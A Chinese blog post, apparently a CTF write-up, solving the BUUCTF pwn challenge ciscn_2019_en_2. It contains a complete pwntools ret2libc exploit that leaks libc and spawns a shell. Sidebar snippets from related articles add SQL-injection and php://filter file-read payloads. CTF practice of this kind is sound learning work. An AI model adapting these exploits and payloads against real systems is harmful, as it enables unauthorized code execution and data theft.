ciscn_2019_en_2

最新推荐文章于 2024-07-15 14:39:10 发布
最新推荐文章于 2024-07-15 14:39:10 发布
阅读量243 收藏
点赞数
文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52231248/article/details/121194714
版权

ciscn_2019_en_2

Ubuntu 18

Checksec一下

Ida:

逻辑很简单,encrypt()里gets函数存在溢出点,offest=0x58

程序里没有出现system函数的plt也没有binsh字段那我们就要ret2libc,但因为是Ubuntu18常规搜了一下ret

发现跟之前的ciscn_2019_c_1好像是一样的,然后确认了一下就直接把之前的exp拿来用了

Exp:

from pwn import*
from LibcSearcher import*
r=remote("node4.buuoj.cn",26768)
elf=ELF("./ciscn_2019_en_2")
pop_rdi_ret=0x400c83
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=0x400B28
r.recv()
r.sendline("1")
r.recvuntil("encrypted\n")
payload=flat("a"*0x58)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.sendline(payload)
r.recvuntil("Ciphertext\n")
r.recvuntil("\n")
addr = u64(r.recv(6).ljust(0x8, b'\x00'))#puts_addr
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump('puts')
print(libcbase)
r.recv()
r.sendline("1")
r.recvuntil("encrypted\n")
sys_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
ret=0x4006b9
payload1=flat("a"*0x58)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys_addr)
r.sendline(payload1)
r.interactive()

成功得到flag:

_white_233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn_2019_en_3
fayinq的博客
03-14 459
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
2021ciscn初赛web部分简单wp
weixin_45805993的博客
05-24 492
0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷 0x01.easy_source Payload http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets 挺简单的,不细说了 用php原生类splFileObject,用ge
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2277
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
ciscn_2019_en_2解题
最新发布
2301_81504456的博客
07-15 293
当遇到\0时以其作为结束符,返回其之前的字符数量,而不是计算后面所跟参数的全部长度。所以可以先添上'\x00'使得跳出加密过程,又因为之前执行了puts函数,利用该性质加上gets的栈溢出,书写第一个payload来泄露gets的libc版本
【CTF】ciscn_2019_en_2
凉水的博客
01-26 3778
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
[CISCN2021]初赛
Huamang的博客
05-16 2001
easy_sql 无列名和报错注入 uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+ 出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307 uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(sele
pwn学习笔记 BUU
2301_79525044的博客
01-11 555
本来配完20和22以后以为自己已经会配基本的环境了,结果18又让我看到了很多新的问题。搜出来的文章大部分都没用,找到有用的文章也忘记保存了,以后如果有缘要重新配环境应该会吃很多亏。之前一直没有做笔记,现在开始正式进入寒假学习。这Ubuntu18的问题比20和22多好多,不停的报错,报错方式不停地变,已经麻了。刚回家,一堆事要搞,没学什么,主要还是配环境。
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4774
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
ciscn_2019_en_2 ret2libc64
pondzhang的专栏
05-02 305
from pwn import * elf = ELF('./libc-2.23.so') p = process("./ciscn_2019_en_2") p.recvuntil('choice!\n') p.sendline("1") p.recvuntil('encrypted\n') poprdiret = 0x0000000000400c83 pltputs = 0x0000000000...
[BUUCTF-pwn]——ciscn_2019_en_2
Y_peak的博客
02-10 820
[BUUCTF-pwn]——ciscn_2019_en_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_en_2 题目: 这是一道和之前一摸一样的题,请点击
【BUUCTF - PWNciscn_2019_en_2
古月浪子的博客
03-25 1189
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWNciscn_2019_c_1 附件:ciscn_2019_en_2
BUUCTF-PWN-ciscn_2019_en_2
Henlenl的博客
05-19 258
文章目录查看文件信息IDA 分析exp 查看文件信息 amd 64位系统 NX保护 IDA 分析 nc 程序连接一下 没什么东西 给了几个选择的按钮 IDA 64分析一波 发现其实程序就只能选择1 而且关键函数是encrypt 我们进去看一下 所以 只要让 var[13] = 17就行了 exp 但是 这里要说明一下 32位程序是能直接去内存中寻址执行的 64位就是要依靠寄存器来寻址 然后找到地址返回给程序去执行的 ...
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 584
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
BUUCTF pwn——ciscn_2019_en_2
CNS-Enterprise BCC-1701-J
04-05 150
BUUCTF 做题练习
SAP PA LO315_EN_46A_FV过程管理系统培训手册
2. Process Management:文件的标题和内容都提到了 Process Management,Process Management 是指企业中对业务流程的管理和优化,旨在提高企业的效率和效益。 3. 版本控制:文件中提到了 Release 4.6,表明该文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值